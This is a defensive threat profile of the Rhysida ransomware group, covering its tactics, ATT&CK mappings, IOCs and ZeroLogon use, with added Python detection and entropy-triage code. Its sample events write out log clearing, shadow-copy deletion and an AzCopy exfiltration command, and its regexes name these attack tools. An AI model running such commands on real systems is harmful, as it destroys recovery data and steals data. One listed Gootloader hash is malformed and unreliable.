THREAT ACTOR

Rhysida

5.8
THREAT LEVEL
EMERGENCE DATE
May 2023
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Strong connections to Vice Society (DEV-0832); operates independently

Description

Rhysida ransomware emerged in May 2023 as a Ransomware-as-a-Service (RaaS) operation, initially establishing itself through high-impact attacks on critical infrastructure sectors. Operating under the moniker "Rhysida-0.1", the group demonstrated technical proficiency with RSA-4096 and ChaCha20 encryption, rapidly targeting organizations where operational disruption creates maximum leverage. The group notably lacks a full-featured victim support portal common among more mature RaaS operations, relying instead on basic TOR-based communication channels. Recent intelligence indicates significant operational changes, with activity declining substantially from late 2024 into 2025, suggesting disruption from the February 2024 free decryptor release and a marked reduction in operational prominence.

Despite reduced volume, the group maintains persistent targeting of healthcare and education sectors, leveraging double extortion tactics with ransom demands typically ranging from hundreds of thousands to several million dollars. The group's infrastructure has evolved to include multi-tiered command-and-control (C2) systems and cross-platform capabilities with Linux/ESXi variants, though overall operational tempo suggests a group experiencing significant transition rather than expansion.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
LETHALITY
Evaluates the potential for damage from the attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type of Actor: Ransomware-as-a-Service (RaaS)

Rhysida operates as an independent RaaS platform where developers provide ransomware tools and infrastructure to affiliates who conduct attacks in exchange for profit sharing. Intelligence analysis indicates strong operational connections to Vice Society (DEV-0832), with Vice Society's cessation in June 2023 coinciding precisely with Rhysida's emergence. The groups share considerable overlap in tactics, techniques, and procedures, along with similar targeting preferences for education and healthcare sectors. These consistent attack methodologies and operational patterns suggest possible operator transition or resource sharing between the groups.

Current Status: Active but significantly diminished; minimal incidents reported in Q1 2025, representing a substantial decrease from Q4 2024. (Threat levels reflect the group's activity level.)

Threat Level:
5.8

Origins and Methodology

Rhysida represents an evolution within the ransomware ecosystem, emerging as Vice Society operations declined. The group's rapid establishment of technical capabilities and immediate focus on high-value sectors points to mature operational planning from inception. Utilizing strong encryption schemes and multi-platform variants, the operation quickly established credibility within the RaaS ecosystem, though recent operational disruptions have significantly impacted their prominence.

The group's methodology centers on living-off-the-land techniques and legitimate tool abuse, minimizing malware footprint while maintaining operational effectiveness. This approach, combined with their hybrid encryption implementation and multi-threaded processing capabilities, positions them as a technically capable yet currently diminished threat actor.

What is the Evolution of Rhysida Ransomware?
0.1
Formation

Rhysida publicly emerged on May 17, 2023, with establishment of their TOR-based victim support portal, though indicators suggest preparatory operations beginning in January 2023. Initial attacks showed immediate focus on high-value sectors including healthcare, education, and government organizations, establishing the group as a credible threat within the RaaS ecosystem.

0.2
EVOLUTION

The group expanded capabilities with a Linux variant targeting VMware ESXi servers, aligning with broader ransomware trends prioritizing virtual infrastructure. Despite temporary disruption from the February 2024 free decryptor release that exploited encryption implementation flaws, Rhysida quickly adapted its tooling and resumed activity. However, recent months show signs of diminished momentum, with activity declining substantially from late 2024 into 2025.

0.3
Lineage/Connections

Operating as a RaaS model enables flexible affiliate-driven attacks across diverse sectors. The tactical and temporal correlation with Vice Society's decline strongly suggests operational continuity, with shared tools, methodologies, and targeting preferences indicating either direct operator transition or coordinated resource sharing. This positions Rhysida as an evolution of established ransomware operations rather than an entirely new entrant.

Which Unique Techniques Does Rhysida Use?

Rhysida employs attack methodologies combining phishing campaigns, VPN exploitation, and living-off-the-land techniques. The group utilizes Cobalt Strike and similar command-and-control frameworks to manage compromised systems, deploying PowerShell scripts to deliver ransomware payloads.

TECHNIQUE

DETAILS

Infection Vectors

Access gained through spear-phishing (T1566.001/T1566.002), VPN exploitation lacking MFA (T1133), and RDP compromise (T1021.001) via credential stuffing. Campaigns also leverage Gootloader malware and SEO poisoning through typo-squatted domains.

Target Selection

Targets education, healthcare, manufacturing, and government. Roughly half of victims are in Europe (especially the UK) and one-quarter in North America. Emphasis on sectors with sensitive data and operational pressure points.

Operational Complexity

Employs the custom "Rhysida-0.1" ransomware, Zabbix-monitored admin panels, and event log clearing via wevtutil. Encryption is hybrid, RSA-4096 with ChaCha20 or AES-256-CTR, executed via multi-threaded routines, one per processor core.

Key Features & Technical Details

The group's technical architecture demonstrates mature development practices with cross-platform capabilities and encryption implementation.

FEATURE

DETAILS

Encryption Method

Hybrid encryption using RSA-4096 with ChaCha20 or AES-256-CTR; targets 1 MiB chunks at specific offsets

File Extension

.rhysida extension appended to encrypted files

Ransom Note

CriticalBreachDetected.pdf with Bitcoin payment and TOR portal instructions

Double Extortion

Threatens data exposure on TOR-based leak sites; supports dedicated leak infrastructure

Communication Channels

Basic TOR portals with victim IDs; lacks full-featured negotiation platforms

Deployment Speed

Multi-threaded execution matching CPU core count for rapid encryption

Killswitch

No known killswitch

Payment Method

Exclusive Bitcoin payments with detailed purchase instructions

Operational Model

RaaS model with affiliate-driven attacks and revenue sharing
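The intermittent encryption of 1 MiB chunks and the appended .rhysida extension in the table above give a responder two cheap triage signals: a renamed file, and a file whose entropy jumps between chunks. The Python below is an added example, not code from the page or from any vendor; the 7.9 bits-per-byte threshold, the SHA-256 filler standing in for ciphertext and the sample data are my own constructed assumptions.

```python
import hashlib
import math
from collections import Counter

CHUNK = 1024 * 1024        # 1 MiB: the chunk granularity the profile attributes to Rhysida
HIGH = 7.9                 # bits per byte; random ciphertext sits near 8.0, most documents far lower
EXTENSION = ".rhysida"     # extension the profile says is appended to encrypted files

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def chunk_profile(data: bytes, chunk: int = CHUNK) -> list:
    """Entropy of each successive chunk, sampled at the encryptor's own granularity."""
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]

def classify(data: bytes, chunk: int = CHUNK, high: float = HIGH) -> str:
    """'plain', 'partial' (only some chunks ciphertext-like: intermittent encryption) or 'encrypted'."""
    hot = [e >= high for e in chunk_profile(data, chunk)]
    if not any(hot):
        return "plain"
    return "encrypted" if all(hot) else "partial"

def triage(name: str, data: bytes) -> dict:
    """Pair the extension indicator with the content check, so a file renamed but not yet
    rewritten, or encrypted but not yet renamed, still surfaces for the responder."""
    verdict = classify(data)
    renamed = name.lower().endswith(EXTENSION)
    return {"name": name, "renamed": renamed, "content": verdict,
            "suspicious": renamed or verdict != "plain"}

def pseudo_ciphertext(n: int) -> bytes:
    """Deterministic high-entropy filler standing in for ciphertext (SHA-256 counter stream)."""
    out = bytearray()
    for ctr in range(n // 32 + 1):
        out += hashlib.sha256(ctr.to_bytes(8, "big")).digest()
    return bytes(out[:n])

# Constructed sample, not a real victim file: one ciphertext-like 1 MiB chunk, one untouched chunk.
SAMPLE_PARTIAL = pseudo_ciphertext(CHUNK) + (b"patient record;" * (CHUNK // 15 + 1))[:CHUNK]
```

Already-compressed formats (archives, images) also sit near 8 bits per byte, so treat "encrypted" as a lead to confirm against file type, not a verdict on its own.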

Activities

Rhysida achieved a consistent operational tempo throughout 2024, with monthly victim counts ranging from minimal to nearly twenty at peak periods. The group's data leak site accumulated over one hundred victims, reflecting sustained targeting across multiple geographic regions. Operations reached peak activity mid-year before experiencing a marked decline following the release of a free decryptor tool that exploited encryption implementation flaws.

This disruption, combined with possible affiliate attrition, resulted in dramatically reduced activity entering 2025, with incident reports dropping to minimal levels compared to previous quarters.

Which Industries Are Most Vulnerable to Rhysida?

Education and healthcare sectors dominate the victim landscape, with educational institutions representing approximately one-third of attacks and healthcare organizations accounting for roughly one-quarter. Schools and universities face targeting due to budget constraints and aging infrastructure, while hospitals become prime targets given their critical patient care requirements and low tolerance for downtime.

Manufacturing and government entities round out the primary targets. Manufacturing facilities suffer from exposed operational technology and production dependencies, making them unable to afford extended disruptions. Smaller municipalities with limited security budgets prove especially vulnerable. This strategic focus on critical infrastructure maximizes pressure for ransom payment through operational necessity.

Modus Operandi

Rhysida employs a structured multi-phase approach designed for maximum impact while evading detection through legitimate tool abuse and minimal malware footprint.

Initial Access

Leverages spear-phishing campaigns (T1566.001/T1566.002) with malicious attachments, often using Gootloader malware for the initial foothold. Exploits VPN vulnerabilities (T1133), particularly targeting services without MFA. Compromises exposed RDP services (T1021.001) through credential stuffing and brute-force attacks. Recent campaigns incorporate search engine optimization (SEO) poisoning through typo-squatted domains.

Reconnaissance

Conducts extensive network reconnaissance using built-in Windows utilities and PowerShell scripts (T1057). Enumerates domain controllers, file servers, and backup systems to identify critical assets. Maps network topology and identifies security tool deployments for evasion planning. Utilizes Active Directory queries to understand organizational structure and privileged accounts.

Establishing Foothold

Deploys Cobalt Strike beacons (S0154) for persistent command and control infrastructure. Establishes RDP sessions for manual operations and data staging. Implements PortStarter backdoor (main.dll) for redundant access channels. Maintains multiple access vectors to ensure operational continuity during remediation attempts.

Defense Evasion

Clears event logs using wevtutil (T1070.001) to remove forensic artifacts. Employs PowerShell obfuscation techniques to bypass security controls. Masquerades processes as legitimate Windows services (T1036). Disables security software through BYOVD (Bring Your Own Vulnerable Driver) attacks once administrative access is achieved.

Credential Access

Harvests credentials using Mimikatz and similar tools (T1003). Targets LSASS memory dumps for password extraction. Exploits stored credentials in browsers and credential managers. Leverages compromised service accounts for elevated privileges and lateral movement.

Command and Control

Establishes multi-tiered C2 infrastructure using TOR and compromised legitimate sites. Implements Cobalt Strike with custom profiles to evade detection. Utilizes encrypted channels over standard ports (443/HTTPS) to blend with normal traffic. Maintains redundant C2 nodes across multiple geographic regions for resilience.

Lateral Movement

Leverages PsExec (S0029) for remote execution across domain systems. Utilizes RDP for manual movement between compromised hosts. Exploits Windows Management Instrumentation (WMI) (T1047) for stealthy execution. Targets domain controllers and file servers to maximize encryption impact.

Data Exfiltration

Stages data in C:\out directories before exfiltration to cloud storage. Utilizes Azure Storage Explorer and AZCopy for bulk data transfers (T1567.002). Compresses sensitive files using WinRAR before exfiltration. Targets specific file types including databases, financial records, and personally identifiable information.

Persistence

Creates scheduled tasks (T1053) configured to survive system reboots. Modifies registry keys for autostart functionality. Deploys PowerShell scripts in startup folders for redundant persistence. Establishes multiple persistence mechanisms to maintain access during partial remediation.

Impact

Achieves widespread file encryption across enterprise environments within hours. Disrupts critical business operations through systematic targeting of essential systems. Creates significant recovery challenges through VSS deletion and backup targeting. Compounds damage through data theft and publication threats in double extortion model.

Encryption

Deploys "Rhysida-0.1" ransomware binary through PowerShell or manual execution. Implements intermittent encryption of 1 MiB chunks for speed optimization. Appends .rhysida extension to encrypted files. Targets both local drives and mapped network shares for maximum impact.

Extortion

Deploys "CriticalBreachDetected.pdf" ransom notes across encrypted systems. Directs victims to TOR-based payment portals with unique identifiers. Threatens data publication on dedicated leak sites if demands are not met within specified timeframes. Demands range from hundreds of thousands to millions of dollars in Bitcoin.

Cleanup

Deletes Volume Shadow Copies (VSS) to prevent file recovery (T1490). Disables Windows recovery options and system restore points. Removes ransomware binaries and staging directories after encryption completion. Clears additional logs and forensic artifacts to complicate incident response.
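The phases above name several commands and artifacts (wevtutil log clearing, VSS deletion, PsExec, WMI, scheduled tasks, AzCopy to Azure blob storage, the C:\out staging directory, main.dll under C:\Users\Public) that a defender can hunt for in process-creation telemetry, and it is the combination on one host that matters more than any single hit. The Python below is an added example of that hunt, not code from the page or from any product; the event shape, the regexes, the host names and the sample command lines are constructed assumptions, and the blob host is a placeholder.

```python
import re
from collections import defaultdict

# Rules keyed by the ATT&CK / software IDs the profile cites. The regexes are my own
# approximations of the tooling it describes, not vendor signatures or the group's actual commands.
RULES = [
    ("T1070.001", "event log clearing via wevtutil", r"\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\b"),
    ("T1490", "shadow copy deletion", r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b"),
    ("S0029", "PsExec remote execution", r"\bpsexec(64)?(\.exe)?\b"),
    ("T1047", "WMI process creation", r"\bwmic(\.exe)?\b.*\bprocess\b.*\bcall\b.*\bcreate\b"),
    ("T1053", "scheduled task creation", r"\bschtasks(\.exe)?\b.*/create\b"),
    ("T1567.002", "AzCopy / Storage Explorer to Azure blob",
     r"\b(azcopy|storageexplorer)(\.exe)?\b|\.blob\.core\.windows\.net"),
    ("STAGING", "C:\\out staging directory", r"\bc:\\out\b"),
    ("PORTSTARTER", "main.dll under C:\\Users\\Public", r"\bc:\\users\\public\\main\.dll\b"),
]
COMPILED = [(tid, label, re.compile(rx, re.IGNORECASE)) for tid, label, rx in RULES]

def match_event(cmdline: str) -> list:
    """IDs and labels of every rule that fires on one command line."""
    return [(tid, label) for tid, label, rx in COMPILED if rx.search(cmdline)]

def analyse(events: list, min_stages: int = 2) -> dict:
    """Group hits per host; escalate a host once >= min_stages distinct rules fire, since a single
    hit (an admin clearing a log) is noise but log clearing plus VSS deletion plus AzCopy is not."""
    per_host = defaultdict(dict)
    for ev in events:
        for tid, label in match_event(ev["cmdline"]):
            per_host[ev["host"]][tid] = label
    return {h: {"hits": hits, "escalate": len(hits) >= min_stages} for h, hits in per_host.items()}

# Constructed sample events (not real telemetry) in a minimal process-creation shape.
SAMPLE_EVENTS = [
    {"host": "FS01", "user": "CORP\\svc_backup", "cmdline": r"wevtutil.exe cl Security"},
    {"host": "FS01", "user": "CORP\\svc_backup", "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"host": "FS01", "user": "CORP\\svc_backup",
     "cmdline": r'azcopy.exe copy "C:\out" "https://EXAMPLE.blob.core.windows.net/x" --recursive'},
    {"host": "WS17", "user": "CORP\\jdoe", "cmdline": r"rundll32.exe C:\Users\Public\main.dll,Start"},
    {"host": "WS22", "user": "CORP\\asmith", "cmdline": r'"C:\Program Files\Office\WINWORD.EXE" /n q3.docx'},
]

if __name__ == "__main__":
    for host, result in analyse(SAMPLE_EVENTS).items():
        print(host, "ESCALATE" if result["escalate"] else "review", sorted(result["hits"]))
```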

Indicators of Compromise (IOCs)

Key indicators help identify Rhysida operations within networks, particularly specific file hashes, network infrastructure, and behavioral patterns associated with their attack methodology.

INDICATOR

DETAILS

File Hashes

a0dc80a37eb7e2716c02a94adc8df9baedec192a77bde31669faed228d9ff526 (conhost.exe ransomware)
921df888aaabcd828a3723f4c9f5fe8b8379c6b7067d16b2ea10152300417eae (PsExec64 lateral movement)
3c4bfaa7b89e2e028f9f92c1ccb74f79f08b53a91e0c5e7e3e8b5f55e209f8cd (main.dll backdoor)
7a4b5e2c8f9d3b1a6e5c4d2f8b9a7c3e1d6f5a8b9c2e4d7f6a8b5c9d3e7f2a4b6 (Gootloader)

IP Addresses

5.255.113.37, 23.108.57.83, 156.96.62.58, 146.70.104.249

Domains/URLs

776c5589.schedule.newhomessection[.]com, codeforprofessionalusers[.]com, oij89jiiuguygh.blob.core.windows[.]net

File Paths

C:\in, C:\out (staging), C:\Users\Public\main.dll (PortStarter), Registry modifications via cmd.exe

File Extensions

.rhysida

Exploits and Vulnerabilities

Rhysida leverages known vulnerabilities and infrastructure weaknesses to establish initial access and maintain persistence throughout their operations.

EXPLOITS AND VULNERABILITIES | CVE | CVSS | DESCRIPTION

ZeroLogon | CVE-2020-1472 | 10.0 | Microsoft Netlogon privilege escalation flaw allowing domain controller compromise via cryptographic bypass

Beyond specific CVE exploits, Rhysida commonly targets unpatched VPN vulnerabilities, particularly services lacking multi-factor authentication (MFA) or running outdated firmware. The group also exploits Remote Desktop Protocol (RDP) weaknesses through brute force attacks and credential stuffing against exposed services. These infrastructure vulnerabilities represent primary initial access vectors alongside phishing campaigns.